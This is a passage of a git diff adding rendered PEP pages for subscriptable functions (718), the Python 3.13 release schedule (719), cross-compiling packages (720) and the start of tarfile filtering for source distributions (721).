+ + + + + \ No newline at end of file diff --git a/pep-0718/index.html b/pep-0718/index.html new file mode 100644 index 00000000000..7ba5ba82ef6 --- /dev/null +++ b/pep-0718/index.html @@ -0,0 +1,339 @@ + + + + + + + + PEP 718 – Subscriptable functions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 718 – Subscriptable functions

+
+
Author:
+
James Hilton-Balfe <gobot1234yt at gmail.com>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
23-Jun-2023
+
Python-Version:
+
3.13
+
Post-History:
+
24-Jun-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes making function objects subscriptable for typing purposes. Doing so +gives developers explicit control over the types produced by the type checker where +bi-directional inference (which allows for the types of parameters of anonymous +functions to be inferred) and other methods than specialisation are insufficient. It +also brings functions in line with regular classes in their ability to be +subscriptable.

+
+
+

Motivation

+
+

Unknown Types

+

Currently, it is not possible to infer the type parameters to generic functions in +certain situations:

+
def make_list[T](*args: T) -> list[T]: ...
+reveal_type(make_list())  # type checker cannot infer a meaningful type for T
+
+
+

Making instances of FunctionType subscriptable would allow for this constructor to +be typed:

+
reveal_type(make_list[int]())  # type is list[int]
+
+
+

Currently you have to use an assignment to provide a precise type:

+
x: list[int] = make_list()
+reveal_type(x)  # type is list[int]
+
+
+

but this code is unnecessarily verbose taking up multiple lines for a simple function +call.

+

Similarly, T in this example cannot currently be meaningfully inferred, so x is +untyped without an extra assignment:

+
def factory[T](func: Callable[[T], Any]) -> Foo[T]: ...
+
+reveal_type(factory(lambda x: "Hello World" * x))
+
+
+

If function objects were subscriptable, however, a more specific type could be given:

+
reveal_type(factory[int](lambda x: "Hello World" * x))  # type is Foo[int]
+
+
+
+
+

Undecidable Inference

+

There are even cases where subclass relations make type inference impossible. However, +if you can specialise the function type checkers can infer a meaningful type.

+
def foo[T](x: Sequence[T] | T) -> list[T]: ...
+
+reveal_type(foo[bytes](b"hello"))
+
+
+

Currently, type checkers do not consistently synthesise a type here.

+
+
+

Unsolvable Type Parameters

+

Currently, with unspecialised literals, it is not possible to determine a type for +situations similar to:

+
def foo[T](x: list[T]) -> T: ...
+reveal_type(foo([]))  # type checker cannot infer T (yet again)
+
+
+
reveal_type(foo[int]([]))  # type is int
+
+
+

It is also useful to be able to specify in cases in which a certain type must be passed +to a function beforehand:

+
words = ["hello", "world"]
+foo[int](words)  # Invalid: list[str] is incompatible with list[int]
+
+
+

Allowing subscription makes functions and methods consistent with generic classes where +they weren’t already. Whilst all of the proposed changes can be implemented using +callable generic classes, syntactic sugar would be highly welcome.

+

Due to this, specialising the function and using it as a new factory is fine

+
make_int_list = make_list[int]
+reveal_type(make_int_list())  # type is list[int]
+
+
+
+
+

Monomorphisation and Reification

+

This proposal also opens the door to +monomorphisation and +reified types.

+

This would allow for a functionality which anecdotally has been requested many times.

+

Please note this feature is not being proposed by the PEP, but may be implemented in +the future.

+

The syntax for such a feature may look something like:

+
def foo[T]():
+   return T.__value__
+
+assert foo[int]() is int
+
+
+
+
+
+

Rationale

+

Function objects in this PEP is used to refer to FunctionType, MethodType, +BuiltinFunctionType, BuiltinMethodType and MethodWrapperType.

+

For MethodType you should be able to write:

+
class Foo:
+    def make_list[T](self, *args: T) -> list[T]: ...
+
+Foo().make_list[int]()
+
+
+

and have it work similarly to a FunctionType.

+

For BuiltinFunctionType, so builtin generic functions (e.g. max and min) +work like ones defined in Python. Built-in functions should behave as much like +functions implemented in Python as possible.

+

BuiltinMethodType is the same type as BuiltinFunctionType.

+

MethodWrapperType (e.g. the type of object().__str__) is useful for +generic magic methods.

+
+
+

Specification

+

Function objects should implement __getitem__ to allow for subscription at runtime +and return an instance of types.GenericAlias with __origin__ set as the +callable and __args__ as the types passed.

+

Type checkers should support subscripting functions and understand that the parameters +passed to the function subscription should follow the same rules as a generic callable +class.

+
+

Setting __orig_class__

+

Currently, __orig_class__ is an attribute set in GenericAlias.__call__ to the +instance of the GenericAlias that created the called class e.g.

+
class Foo[T]: ...
+
+assert Foo[int]().__orig_class__ == Foo[int]
+
+
+

Currently, __orig_class__ is unconditionally set; however, to avoid potential +erasure on any created instances, this attribute should not be set if __origin__ is +an instance of any function object.

+

The following code snippet would fail at runtime without this change as +__orig_class__ would be bar[str] and not Foo[int].

+
def bar[U]():
+    return Foo[int]()
+
+assert bar[str]().__orig_class__  == Foo[int]
+
+
+
+
+

Interactions with @typing.overload

+

Overloaded functions should work much the same as already, since they have no effect on +the runtime type. The only change is that more situations will be decidable and the +behaviour/overload can be specified by the developer rather than leaving it to ordering +of overloads/unions.

+
+
+
+

Backwards Compatibility

+

Currently these classes are not subclassable and so there are no backwards +compatibility concerns with regards to classes already implementing +__getitem__.

+
+
+

Reference Implementation

+

The runtime changes proposed can be found here +https://github.com/Gobot1234/cpython/tree/function-subscript

+
+
+

Acknowledgements

+

Thank you to Alex Waygood and Jelle Zijlstra for their feedback on this PEP and Guido +for some motivating examples.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0718.rst

+

Last modified: 2024-02-17 03:29:08 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0719/index.html b/pep-0719/index.html new file mode 100644 index 00000000000..c988981423e --- /dev/null +++ b/pep-0719/index.html @@ -0,0 +1,220 @@ + + + + + + + + PEP 719 – Python 3.13 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 719 – Python 3.13 Release Schedule

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
26-May-2023
+
Python-Version:
+
3.13
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.13.

+
+
+

Release Manager and Crew

+
    +
  • 3.13 Release Manager: Thomas Wouters
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.13.0 schedule

+

Note: the dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.13 development begins: Monday, 2023-05-22
  • +
  • 3.13.0 alpha 1: Friday, 2023-10-13
  • +
  • 3.13.0 alpha 2: Wednesday, 2023-11-22
  • +
  • 3.13.0 alpha 3: Wednesday, 2024-01-17
  • +
  • 3.13.0 alpha 4: Thursday, 2024-02-15
  • +
  • 3.13.0 alpha 5: Tuesday, 2024-03-12
  • +
  • 3.13.0 alpha 6: Tuesday, 2024-04-09
  • +
  • 3.13.0 beta 1: Wednesday, 2024-05-08 +(No new features beyond this point.)
  • +
  • 3.13.0 beta 2: Wednesday, 2024-06-05
  • +
  • 3.13.0 beta 3: Thursday, 2024-06-27
  • +
  • 3.13.0 beta 4: Thursday, 2024-07-18
  • +
  • 3.13.0 candidate 1: Thursday, 2024-08-01
  • +
  • 3.13.0 candidate 2: Friday, 2024-09-06
  • +
  • 3.13.0 candidate 3: Tuesday, 2024-10-01
  • +
  • 3.13.0 final: Monday, 2024-10-07
  • +
  • 3.13.1: Tuesday, 2024-12-03
  • +
+
+
+

Bugfix releases

+

Expected:

+
    +
  • 3.13.2: Tuesday, 2025-02-04
  • +
  • 3.13.3: Tuesday, 2025-04-08
  • +
  • 3.13.4: Tuesday, 2025-06-03
  • +
  • 3.13.5: Tuesday, 2025-08-05
  • +
  • 3.13.6: Tuesday, 2025-10-07
  • +
  • 3.13.7: Tuesday, 2025-12-02
  • +
  • 3.13.8: Tuesday, 2026-02-03
  • +
  • 3.13.9: Tuesday, 2026-04-07
  • +
  • 3.13.10: Tuesday, 2026-06-09
  • +
  • 3.13.11: Tuesday, 2026-08-04
  • +
  • 3.13.12: Tuesday, 2026-10-06
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an as-needed basis until October 2029.

+
+
+

3.13 Lifespan

+

3.13 will receive bugfix updates approximately every 2 months for +approximately 24 months. Around the time of the release of 3.15.0 final, the +final 3.13 bugfix update will be released. After that, it is expected that +security updates (source only) will be released until 5 years after the +release of 3.13.0 final, so until approximately October 2029.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0719.rst

+

Last modified: 2024-12-05 19:08:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0720/index.html b/pep-0720/index.html new file mode 100644 index 00000000000..a70e6835eac --- /dev/null +++ b/pep-0720/index.html @@ -0,0 +1,1109 @@ + + + + + + + + PEP 720 – Cross-compiling Python packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 720 – Cross-compiling Python packages

+
+
Author:
+
Filipe Laíns <lains at riseup.net>
+
PEP-Delegate:
+

+
Status:
+
Draft
+
Type:
+
Informational
+
Created:
+
01-Jul-2023
+
Python-Version:
+
3.12
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP attempts to document the status of cross-compilation of downstream +projects.

+

It should give an overview of the approaches currently used by distributors +(Linux distros, WASM environment providers, etc.) to cross-compile downstream +projects (3rd party extensions, etc.).

+
+
+

Motivation

+

We write this PEP to express the challenges in cross-compilation and act as a +supporting document in future improvement proposals.

+
+
+

Analysis

+
+

Introduction

+

There are a couple different approaches being used to tackle this, with +different levels of interaction required from the user, but they all require a +significant amount of effort. This is due to the lack of standardized +cross-compilation infrastructure on the Python packaging ecosystem, which itself +stems from the complexity of cross-builds, making it a huge undertaking.

+
+
+

Upstream support

+

Some major projects like CPython, setuptools, etc. provide some support to help +with cross-compilation, but it’s unofficial and at a best-effort basis. For +example, the sysconfig module allows overwriting the data module name via +the _PYTHON_SYSCONFIGDATA_NAME environment variable, something that is +required for cross-builds, and setuptools accepts patches [1] to tweak/fix +its logic to be compatible with popular “environment faking” workflows [2].

+

The lack of first-party support in upstream projects leads to cross-compilation +being fragile and requiring a significant effort from users, but at the same +time, the lack of standardization makes it harder for upstreams to improve +support as there’s no clarity on how this feature should be provided.

+ +
+

Projects with decent cross-build support

+

It seems relevant to point out that there are a few modern Python package +build-backends with, at least, decent cross-compilation support, those being +scikit-build and meson-python. Both these projects integrate external mature +build-systems into Python packaging — CMake and Meson, respectively — so +cross-build support is inherited from them.

+
+
+
+

Downstream approaches

+

Cross-compilation approaches fall in a spectrum that goes from, by design, +requiring extensive user interaction to (ideally) almost none. Usually, they’ll +be based on one of two main strategies, using a cross-build environment, +or faking the target environment.

+
+

Cross-build environment

+

This consists of running the Python interpreter normally and utilizing the +cross-build provided by the projects’ build-system. However, as we saw above, +upstream support is lacking, so this approach only works for a small-ish set of +projects. When this fails, the usual strategy is to patch the build-system code +to build use the correct toolchain, system details, etc. [3].

+

Since this approach often requires package-specific patching, it requires a lot +of user interaction.

+
+

Examples

+

python-for-android, kivy-ios, etc.

+
+ +
+
+

Faking the target environment

+

Aiming to drop the requirement for user input, a popular approach is trying to +fake the target environment. It generally consists of monkeypatching the Python +interpreter to get it to mimic the interpreter on the target system, which +constitutes of changing many of the sys module attributes, the sysconfig +data, etc. Using this strategy, build-backends do not need to have any +cross-build support, and should just work without any code changes.

+

Unfortunately, though, it isn’t possible to truly fake the target environment. +There are many reasons for this, one of the main ones being that it breaks code +that actually needs to introspect the running interpreter. As a result, +monkeypatching Python to look like target is very tricky — to achieve the less +amount of breakage, we can only patch certain aspects of the interpreter. +Consequently, build-backends may need some code changes, but these are generally +much smaller than the previous approach. This is an inherent limitation of the +technique, meaning this strategy still requires some user interaction.

+

Nonetheless, this strategy still works out-of-the-box with significantly more +projects than the approach above, and requires much less effort in these cases. +It is successful in decreasing the amount of user interaction needed, even +though it doesn’t succeed in being generic.

+
+

Examples

+

crossenv, conda-forge, etc.

+
+
+
+
+

Environment introspection

+

As explained above, most build system code is written with the assumption that +the target system is the same as where the build is occurring, so introspection +is usually used to guide the build.

+

In this section, we try to document most of the ways this is accomplished. It +should give a decent overview of of environment details that are required by +build systems.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SnippetDescriptionVariance
>>> importlib.machinery.EXTENSION_SUFFIXES
+[
+   '.cpython-311-x86_64-linux-gnu.so',
+   '.abi3.so',
+   '.so',
+]
+
+
+
Extension (native module) suffixes supported by this interpreter.This is implementation-defined, but it usually differs based on the +implementation, system architecture, build configuration, Python +language version, and implementation version — if one exists.
>>> importlib.machinery.SOURCE_SUFFIXES
+['.py']
+
+
+
Source (pure-Python) suffixes supported by this interpreter.This is implementation-defined, but it usually doesn’t differ +(outside exotic implementations or systems).
>>> importlib.machinery.all_suffixes()
+[
+   '.py',
+   '.pyc',
+   '.cpython-311-x86_64-linux-gnu.so',
+   '.abi3.so',
+   '.so',
+]
+
+
+
All module file suffixes supported by this interpreter. It should be the +union of all importlib.machinery.*_SUFFIXES attributes.This is implementation-defined, but it usually differs based on the +implementation, system architecture, build configuration, Python +language version, and implementation version — if one exists. See the +entries above for more information.
>>> sys.abiflags
+''
+
+
+
ABI flags, as specified in PEP 3149.Differs based on the build configuration.
>>> sys.api_version
+1013
+
+
+
C API version.Differs based on the Python installation.
>>> sys.base_prefix
+/usr
+
+
+
Prefix of the installation-wide directories where platform independent +files are installed.Differs based on the platform, and installation.
>>> sys.base_exec_prefix
+/usr
+
+
+
Prefix of the installation-wide directories where platform dependent +files are installed.Differs based on the platform, and installation.
>>> sys.byteorder
+'little'
+
+
+
Native byte order.Differs based on the platform.
>>> sys.builtin_module_names
+('_abc', '_ast', '_codecs', ...)
+
+
+
Names of all modules that are compiled into the Python interpreter.Differs based on the platform, system architecture, and build +configuration.
>>> sys.exec_prefix
+/usr
+
+
+
Prefix of the site-specific directories where platform independent files +are installed. Because it concerns the site-specific directories, in +standard virtual environment implementation, it will be a +virtual-environment-specific path.Differs based on the platform, installation, and environment.
>>> sys.executable
+'/usr/bin/python'
+
+
+
Path of the Python interpreter being used.Differs based on the installation.
>>> with open(sys.executable, 'rb') as f:
+...   header = f.read(4)
+...   if is_elf := (header == b'\x7fELF'):
+...     elf_class = int(f.read(1))
+...     size = {1: 52, 2: 64}.get(elf_class)
+...     elf_header = f.read(size - 5)
+
+
+
Whether the Python interpreter is an ELF file, and the ELF header. This +approach is something used to identify the target architecture of the +installation (example).Differs based on the installation.
>>> sys.float_info
+sys.float_info(
+   max=1.7976931348623157e+308,
+   max_exp=1024,
+   max_10_exp=308,
+   min=2.2250738585072014e-308,
+   min_exp=-1021,
+   min_10_exp=-307,
+   dig=15,
+   mant_dig=53,
+   epsilon=2.220446049250313e-16,
+   radix=2,
+   rounds=1,
+)
+
+
+
Low level information about the float type, as defined by float.h.Differs based on the architecture, and platform.
>>> sys.getandroidapilevel()
+21
+
+
+
Integer representing the Android API level.Differs based on the platform.
>>> sys.getwindowsversion()
+sys.getwindowsversion(
+   major=10,
+   minor=0,
+   build=19045,
+   platform=2,
+   service_pack='',
+)
+
+
+
Windows version of the system.Differs based on the platform.
>>> sys.hexversion
+0x30b03f0
+
+
+
Python version encoded as an integer.Differs based on the Python language version.
>>> sys.implementation
+namespace(
+   name='cpython',
+   cache_tag='cpython-311',
+   version=sys.version_info(
+      major=3,
+      minor=11,
+      micro=3,
+      releaselevel='final',
+      serial=0,
+   ),
+   hexversion=0x30b03f0,
+   _multiarch='x86_64-linux-gnu',
+)
+
+
+
Interpreter implementation details.Differs based on the interpreter implementation, Python language +version, and implementation version — if one exists. It may also include +architecture-dependent information, so it may also differ based on the +system architecture.
>>> sys.int_info
+sys.int_info(
+   bits_per_digit=30,
+   sizeof_digit=4,
+   default_max_str_digits=4300,
+   str_digits_check_threshold=640,
+)
+
+
+
Low level information about Python’s internal integer representation.Differs based on the architecture, platform, implementation, build, and +runtime flags.
>>> sys.maxsize
+0x7fffffffffffffff
+
+
+
Maximum value a variable of type Py_ssize_t can take.Differs based on the architecture, platform, and implementation.
>>> sys.maxunicode
+0x10ffff
+
+
+
Value of the largest Unicode code point.Differs based on the implementation, and on Python versions older than +3.3, the build.
>>> sys.platform
+linux
+
+
+
Platform identifier.Differs based on the platform.
>>> sys.prefix
+/usr
+
+
+
Prefix of the site-specific directories where platform dependent files +are installed. Because it concerns the site-specific directories, in +standard virtual environment implementation, it will be a +virtual-environment-specific path.Differs based on the platform, installation, and environment.
>>> sys.platlibdir
+lib
+
+
+
Platform-specific library directory.Differs based on the platform, and vendor.
>>> sys.version_info
+sys.version_info(
+   major=3,
+   minor=11,
+   micro=3,
+   releaselevel='final',
+   serial=0,
+)
+
+
+
Python language version implemented by the interpreter.Differs if the target Python version is not the same [4].
>>> sys.thread_info
+sys.thread_info(
+   name='pthread',
+   lock='semaphore',
+   version='NPTL 2.37',
+)
+
+
+
Information about the thread implementation.Differs based on the platform, and implementation.
>>> sys.winver
+3.8-32
+
+
+
Version number used to form Windows registry keys.Differs based on the platform, and implementation.
>>> sysconfig.get_config_vars()
+{ ... }
+>>> sysconfig.get_config_var(...)
+...
+
+
+
Python distribution configuration variables. It includes a set of +variables [5] — like prefix, exec_prefix, etc. — based on the +running context [6], and may include some extra variables based on the +Python implementation and system.

In CPython and most other implementations that use the same +build-system, the “extra” variables mention above are: on POSIX, all +variables from the Makefile used to build the interpreter, and on +Windows, it usually only includes a small subset of the those [7] — +like EXT_SUFFIX, BINDIR, etc.

+
This is implementation-defined, but it usually differs between +non-identical builds. Please refer to the +sysconfig configuration variables table for a overview of the different +configuration variable that are usually present.
+ +
+

CPython (and similar)

+ + ++++++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
sysconfig configuration variables
NameExample ValueDescriptionVariance
SOABIcpython-311-x86_64-linux-gnuABI string — defined by PEP 3149.Differs based on the implementation, system architecture, Python +language version, and implementation version — if one exists.
SHLIB_SUFFIX.soShared library suffix.Differs based on the platform.
EXT_SUFFIX.cpython-311-x86_64-linux-gnu.soInterpreter-specific Python extension (native module) suffix — generally +defined as .{SOABI}.{SHLIB_SUFFIX}.Differs based on the implementation, system architecture, Python +language version, and implementation version — if one exists.
LDLIBRARYlibpython3.11.soShared libpython library name — if available. If unavailable [8], +the variable will be empty, if available, the library should be located +in LIBDIR.Differs based on the implementation, system architecture, build +configuration, Python language version, and implementation version — if +one exists.
PY3LIBRARYlibpython3.soShared Python 3 only (major version bound only) [9] libpython +library name — if available. If unavailable [8], the variable will be +empty, if available, the library should be located in LIBDIR.Differs based on the implementation, system architecture, build +configuration, Python language version, and implementation version — if +one exists.
LIBRARYlibpython3.11.aStatic libpython library name — if available. If unavailable [8], +the variable will be empty, if available, the library should be located +in LIBDIR.Differs based on the implementation, system architecture, build +configuration, Python language version, and implementation version — if +one exists.
Py_DEBUG0Whether this is a debug build.Differs based on the build configuration.
WITH_PYMALLOC1Whether this build has pymalloc support.Differs based on the build configuration.
Py_TRACE_REFS0Whether reference tracing (debug build only) is enabled.Differs based on the build configuration.
Py_UNICODE_SIZESize of the Py_UNICODE object, in bytes. This variable is only +present in CPython versions older than 3.3, and was commonly used to +detect if the build uses UCS2 or UCS4 for unicode objects — before +PEP 393.Differs based on the build configuration.
Py_ENABLE_SHARED1Whether a shared libpython is available.Differs based on the build configuration.
PY_ENABLE_SHARED1Whether a shared libpython is available.Differs based on the build configuration.
CCgccThe C compiler used to build the Python distribution.Differs based on the build configuration.
CXXg++The C compiler used to build the Python distribution.Differs based on the build configuration.
CFLAGS-DNDEBUG -g -fwrapv ...The C compiler flags used to build the Python distribution.Differs based on the build configuration.
py_version3.11.3Full form of the Python version.Differs based on the Python language version.
py_version_short3.11Custom form of the Python version, containing only the major and minor +numbers.Differs based on the Python language version.
py_version_nodot311Custom form of the Python version, containing only the major and minor +numbers, and no dots.Differs based on the Python language version.
prefix/usrSame as sys.prefix, please refer to the entry in table above.Differs based on the platform, installation, and environment.
base/usrSame as sys.prefix, please refer to the entry in table above.Differs based on the platform, installation, and environment.
exec_prefix/usrSame as sys.exec_prefix, please refer to the entry in table above.Differs based on the platform, installation, and environment.
platbase/usrSame as sys.exec_prefix, please refer to the entry in table above.Differs based on the platform, installation, and environment.
installed_base/usrSame as sys.base_prefix, please refer to the entry in table above.Differs based on the platform, and installation.
installed_platbase/usrSame as sys.base_exec_prefix, please refer to the entry in table +above.Differs based on the platform, and installation.
platlibdirlibSame as sys.platlibdir, please refer to the entry in table above.Differs based on the platform, and vendor.
SIZEOF_*4Size of a certain C type (double, float, etc.).Differs based on the system architecture, and build details.
+ +
+
+
+

Relevant Information

+

There are some bits of information required by build systems — eg. platform +particularities — scattered across many places, and it often is difficult to +identify code with assumptions based on them. In this section, we try to +document the most relevant cases.

+
+

When should extensions be linked against libpython?

+
+
Short answer
Yes, on Windows. No on POSIX platforms, except Android, Cygwin, and other +Windows-based POSIX-like platforms.
+
+

When building extensions for dynamic loading, depending on the target platform, +they may need to be linked against libpython.

+

On Windows, extensions need to link against libpython, because all symbols +must be resolvable at link time. POSIX-like platforms based on Windows — like +Cygwin, MinGW, or MSYS — will also require linking against libpython.

+

On most POSIX platforms, it is not necessary to link against libpython, as +the symbols will already be available in the due to the interpreter — or, when +embedding, the executable/library in question — already linking to +libpython. Not linking an extension module against libpython will allow +it to be loaded by static Python builds, so when possible, it is desirable to do +so (see GH-65735).

+

This might not be the case on all POSIX platforms, so make sure you check. One +example is Android, where only the main executable and LD_PRELOAD entries +are considered to be RTLD_GLOBAL (meaning dependencies are RTLD_LOCAL) +[10], which causes the libpython symbols be unavailable when loading the +extension.

+ +
+
+

What are prefix, exec_prefix, base_prefix, and base_exec_prefix?

+

These are sys attributes set in the Python initialization that describe +the running environment. They refer to the prefix of directories where +installation/environment files are installed, according to the table below.

+ + + + + + + + + + + + + + + + + + + + + + + + + +
NameTarget filesEnvironment Scope
prefixplatform independent (eg. pure Python)site-specific
exec_prefixplatform dependent (eg. native code)site-specific
base_prefixplatform independent (eg. pure Python)installation-wide
base_exec_prefixplatform dependent (eg. native code)installation-wide
+

Because the site-specific prefixes will be different inside virtual +environments, checking sys.prexix != sys.base_prefix is commonly used to +check if we are in a virtual environment.

+
+
+
+
+

Case studies

+
+

crossenv

+
+
Description:
+
Virtual Environments for Cross-Compiling Python Extension Modules.
+
URL:
+
https://github.com/benfogle/crossenv
+
+

crossenv is a tool to create a virtual environment with a monkeypatched +Python installation that tries to emulate the target machine in certain +scenarios. More about this approach can be found in the +Faking the target environment section.

+
+
+

conda-forge

+
+
Description:
+
A community-led collection of recipes, build infrastructure and distributions for the conda package manager.
+
URL:
+
https://conda-forge.org/
+
+

XXX: Jaime will write a quick summary once the PEP draft is public.

+

XXX +Uses a modified crossenv.

+
+
+

Yocto Project

+
+
Description:
+
The Yocto Project is an open source collaboration project that helps developers create custom Linux-based systems regardless of the hardware architecture.
+
URL:
+
https://www.yoctoproject.org/
+
+

XXX: Sent email to the mailing list.

+

TODO

+
+
+

Buildroot

+
+
Description:
+
Buildroot is a simple, efficient and easy-to-use tool to generate embedded Linux systems through cross-compilation.
+
URL:
+
https://buildroot.org/
+
+

TODO

+
+
+

Pyodide

+
+
Description:
+
Pyodide is a Python distribution for the browser and Node.js based on WebAssembly.
+
URL:
+
https://pyodide.org/en/stable/
+
+

XXX: Hood should review/expand this section.

+

Pyodide is a provides a Python distribution compiled to WebAssembly +using the Emscripten toolchain.

+

It patches several aspects of the CPython installation and some external +components. A custom package manager — micropip — supporting both Pure and +wasm32/Emscripten wheels, is also provided as a part of the distribution. On top +of this, a repo with a selected set of 3rd party packages is also provided +and enabled by default.

+
+
+

Beeware

+
+
Description:
+
BeeWare allows you to write your app in Python and release it on multiple platforms.
+
URL:
+
https://beeware.org/
+
+

TODO

+
+
+

python-for-android

+
+
Description:
+
Turn your Python application into an Android APK.
+
URL:
+
https://github.com/kivy/python-for-android
+
+

resource https://github.com/Android-for-Python/Android-for-Python-Users

+

python-for-android is a tool to package Python apps on Android. It creates a +Python distribution with your app and its dependencies.

+

Pure-Python dependencies are handled automatically and in a generic way, but +native dependencies need recipes. A set of recipes for +popular dependencies is provided, but users need to provide their own +recipes for any other native dependencies.

+
+
+

kivy-ios

+
+
Description:
+
Toolchain for compiling Python / Kivy / other libraries for iOS.
+
URL:
+
https://github.com/kivy/kivy-ios
+
+

kivy-ios is a tool to package Python apps on iOS. It provides a toolchain to +build a Python distribution with your app and its dependencies, as well as a CLI +to create and manage Xcode projects that integrate with the toolchain.

+

It uses the same approach as python-for-android (also maintained by the +Kivy project) for app dependencies — pure-Python dependencies are handled +automatically, but native dependencies need recipes, and the project provides +recipes for popular dependencies.

+
+
+

AidLearning

+
+
Description:
+
AI, Android, Linux, ARM: AI application development platform based on Android+Linux integrated ecology.
+
URL:
+
https://github.com/aidlearning/AidLearning-FrameWork
+
+

TODO

+
+
+

QPython

+
+
Description:
+
QPython is the Python engine for android.
+
URL:
+
https://github.com/qpython-android/qpython
+
+

TODO

+
+
+

pyqtdeploy

+
+
Description:
+
pyqtdeploy is a tool for deploying PyQt applications.
+
URL:
+
https://www.riverbankcomputing.com/software/pyqtdeploy/
+
+

contact https://www.riverbankcomputing.com/pipermail/pyqt/2023-May/thread.html +contacted Phil, the maintainer

+

TODO

+
+
+

Chaquopy

+
+
Description:
+
Chaquopy provides everything you need to include Python components in an Android app.
+
URL:
+
https://chaquo.com/chaquopy/
+
+

TODO

+
+
+

EDK II

+
+
Description:
+
EDK II is a modern, feature-rich, cross-platform firmware development environment for the UEFI and PI specifications.
+
URL:
+
https://github.com/tianocore/edk2-libc/tree/master/AppPkg/Applications/Python
+
+

TODO

+
+
+

ActivePython

+
+
Description:
+
Commercial-grade, quality-assured Python distribution focusing on easy installation and cross-platform compatibility on Windows, Linux, Mac OS X, Solaris, HP-UX and AIX.
+
URL:
+
https://www.activestate.com/products/python/
+
+

TODO

+
+
+

Termux

+
+
Description:
+
Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required.
+
URL:
+
https://termux.dev/en/
+
+

TODO

+
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0720.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0721/index.html b/pep-0721/index.html new file mode 100644 index 00000000000..7a2aa488edd --- /dev/null +++ b/pep-0721/index.html @@ -0,0 +1,327 @@ + + + + + + + + PEP 721 – Using tarfile.data_filter for source distribution extraction | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 721 – Using tarfile.data_filter for source distribution extraction

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Requires:
+
706
+
Created:
+
12-Jul-2023
+
Python-Version:
+
3.12
+
Post-History:
+
04-Jul-2023
+
Resolution:
+
02-Aug-2023
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Source distribution archive features, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

Extracting a source distribution archive should normally use the data +filter added in PEP 706. +We clarify details, and specify the behaviour for tools that cannot use the +filter directly.

+
+
+

Motivation

+

The source distribution sdist is defined as a tar archive.

+

The tar format is designed to capture all metadata of Unix-like files. +Some of these are dangerous, unnecessary for source code, and/or +platform-dependent. +As explained in PEP 706, when extracting a tarball, one should always either +limit the allowed features, or explicitly give the tarball total control.

+
+
+

Rationale

+

For source distributions, the data filter introduced in PEP 706 +is enough. It allows slightly more features than git and zip (both +commonly used in packaging workflows).

+

However, not all tools can use the data filter, +so this PEP specifies an explicit set of expectations. +The aim is that the current behaviour of pip download +and setuptools.archive_util.unpack_tarfile is valid, +except cases deemed too dangerous to allow. +Another consideration is ease of implementation for non-Python tools.

+
+

Unpatched versions of Python

+

Tools are allowed to ignore this PEP when running on Python without tarfile +filters.

+

The feature has been backported to all versions of Python supported by +python.org. Vendoring it in third-party libraries is tricky, +and we should not force all tools to do so. +This shifts the responsibility to keep up with security updates from the tools +to the users.

+
+
+

Permissions

+

Common tools (git, zip) don’t preserve Unix permissions (mode bits). +Telling users to not rely on them in sdists, and allowing tools to handle +them relatively freely, seems fair.

+

The only exception is the executable permission. +We recommend, but not require, that tools preserve it. +Given that scripts are generally platform-specific, it seems fitting to +say that keeping them executable is tool-specific behaviour.

+

Note that while git preserves executability, zip (and thus wheel) +doesn’t do it natively. (It is possible to encode it in “external attributes”, +but Python’s ZipFile.extract does not honour that.)

+
+
+
+

Specification

+

The following will be added to the PyPA source distribution format spec +under a new heading, “Source distribution archive features”:

+

Because extracting tar files as-is is dangerous, and the results are +platform-specific, archive features of source distributions are limited.

+
+

Unpacking with the data filter

+

